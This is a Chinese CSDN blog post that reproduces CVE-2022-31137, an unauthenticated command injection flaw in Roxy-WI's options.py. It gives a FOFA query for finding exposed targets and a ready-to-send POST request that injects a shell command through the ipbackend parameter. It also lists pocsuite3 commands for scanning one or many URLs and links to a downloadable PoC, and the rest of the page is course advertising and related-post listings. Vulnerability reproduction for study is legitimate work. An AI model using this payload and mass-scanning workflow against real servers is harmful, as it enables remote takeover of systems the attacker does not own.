CVE-2022-31137

于 2023-12-22 20:30:00 发布
阅读量101 收藏
点赞数
文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115097/article/details/135155109
版权

Roxy-Wi  远程命令执行漏洞 CVE-2022-31137

此文章仅供用于学习研究,严禁用于非法用途,否则后果自负。

漏洞简介

Roxy-Wi options.py 存在远程命令执行漏洞,攻击者通过漏洞可以执行命令获取服务器权限

漏洞影响

Roxy-WI

FOFA语法

 app="HAProxy-WI"

漏洞复现

登录页面

图片

验证POC

 POST /app/options.py
   
 alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1

图片

POC简介:

使用的是pocsuite3模块 

安装

pip3 install pocsuite3

 #单个URL检测
 pocsuite -r CVE-2022-31137.py -u url
 #多个URL检测
 pocsuite -r CVE-2022-31137.py -f u.txt
 #检测并保持到a.json
 pocsuite -r CVE-2022-31137.py -u url -o a.json

POC下载地址:

https://pan.baidu.com/s/1KTw0S129jO-LZTooI7YMQw?pwd=i1v6 

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

黑客大佬
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
复现CVE-2022-31137——Roxy-Wi options.py 远程命令执行漏洞
记录并分享学习安全的知识点..
10-05 2018
Roxy-WI是开源的一款用于管理 Haproxy、Nginx 和 Keepalived 服务器的 Web 界面。 Roxy-WI 6.1.1.0 之前版本options.py接口存在远程命令执行漏洞,攻击者通过漏洞可以执行命令获取服务器权限。
Roxy-Wi 远程命令执行漏洞 CVE-2022-31137
LiBai'S BLOG
10-12 3285
Roxy-WI是用于管理Haproxy、Nginx和Keepalived服务器的Web界面。Roxy-WI 5.2.2.0及更早版本存在命令注入漏洞。攻击者可通过options.py利用该漏洞进行命令注入攻击。
CVE-2022-31137 Roxy-WI未经身份验证的远程代码执行漏洞复现
热爱学习,喜欢折腾!
11-09 1869
Roxy-WI是开源的一款用于管理 Haproxy、Nginx 和 Keepalived 服务器的 Web 界面。Roxy-WI 6.1.1.0 之前的版本存在安全漏洞,该漏洞源于系统命令可以通过 subprocess_execute 函数远程运行,远程攻击者利用该漏洞可以执行远程代码。
haproxy-wi:用于管理Haproxy,Nginx和Keepalived服务器的Web界面
02-05
Web界面(用户友好的Web GUI,警报,监视和安全),用于管理HAProxy,Nginx和Keepalived服务器。 留下您的 参与其中 ,订阅! 关于HAProxy-WI的,欢迎进行讨论和提问 示范现场 登录名/密码:admin / admin。 服务器每小时重置一次。 特征: 使用HAProxy-WI安装和更新HAProxy,Nginx和Keepalived 使用HAProxy-WI安装和更新Grafana,Prometheus服务器 使用HAProxy-WI安装和更新HAProxy和Nginx导出器 使用HAProxy-WI轻松配置HAProxy,Nginx和Keepali
haproxy-wi 一款国外的HAPROXY面板管理工具 在线配置修改【2020踩坑记录】
logincheck的博客
09-14 3790
源github: https://github.com/Aidaho12/haproxy-wi 官方安装文档: https://haproxy-wi.org/installation.py#manual 官方提供rpm和docker两种安装方式,然而使用这两种需要“捐赠”获得账号才能使用,捐赠是以每月不同套餐对应不同功能…… 手动安装原文: Manual $ cd /var/www/ $ git clone https://github.com/Aid...
使用HAproxy搭建web群集原来这么简单(宇宙真的好谦虚啊,明明拥有一切,却叫太空)
qq_42327944的博客
05-19 554
HAproxy是可提供高可用性、负载均衡以及基于TCT和HTTP应用的代理,是免费、快速并且可靠的一种解决方案。HAproxy非常适用于弄发大(并发达1w以上)web站点,这些站点通常又需要会话保持或七层处理。HAProxy的运行模式使得它可以很简单安全的整合至当前的架构中,同时可以保护web服务器不被暴露到网络上。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
haproxy-web服务器
09-25
负载技术所使用,可以负载的均衡效果是非常好的,性能非常好,HAProxy特别适用于那些负载特大的web站点,这些站点通常又需要会话保持或七层处理。HAProxy运行在当前的硬件上,完全可以支持数以万计的并发连接。并且它的运行模式使得它可以很简单安全的整合进您当前的架构中, 同时可以保护你的web服务器不被暴露到网络上。
haproxy-1.8.14 windows 最新稳定版本
10-11
haproxy-1.8.14 windows 带运行库 不要双击运行,减压到本地以后,才可以用 自己用Cygwin64 Terminal编译的,这个是64位版本
Go-适用于K8s的HAProxy入口控制器
08-14
适用于K8s的HAProxy入口控制器
Python-用于管理Haproxy服务器的Web界面用户友好的WebGUI
08-11
用于管理Haproxy服务器的Web界面(用户友好的Web GUI)
haproxy-1.7.10 windows 最新稳定版本
05-21
haproxy-1.7.10 windows版本 带运行库,可以直接运行。自己用Cygwin64 Terminal编译的,这个是64位版本
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
linux haproxy 脚本,使用haproxy-wi从Web界面管理HAProxy服务器
weixin_34331737的博客
04-30 878
本文介绍从Web界面管理HAProxy服务器的方法,管理HAProxy的标准方法是手动编辑配置文件或使用Ansible、Puppet或Chef等配置管理工具来更改。本文将介绍如何使用第三方工具haproxy-wi从Web界面管理HAProxy服务器。haproxy-wi web的特点通过统计信息页面启用/禁用服务器,而无需重新启动HAProxy。直接从Web界面查看/分析HAproxy日志。将你的...
HAproxy搭建7层与四层负载均衡
xuyang980926的博客
05-31 438
(一)HAProxy是一个免费的负载均衡软件,可以运行于大部分主流的Linux操作系统上(CentOS、Ubuntu、Debian、OpenSUSE、Fedora、麒麟、欧拉、UOS)。(二)HAProxy提供了L4(TCP)和L7(HTTP)两种负载均衡能力,具备丰富的功能。HAProxy具备媲美商用负载均衡器的性能和稳定性。
HAproxy基础配置
2302_77349861的博客
05-30 1828
1.haproxy需要有gcc环境2.客户端13.客户端2。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值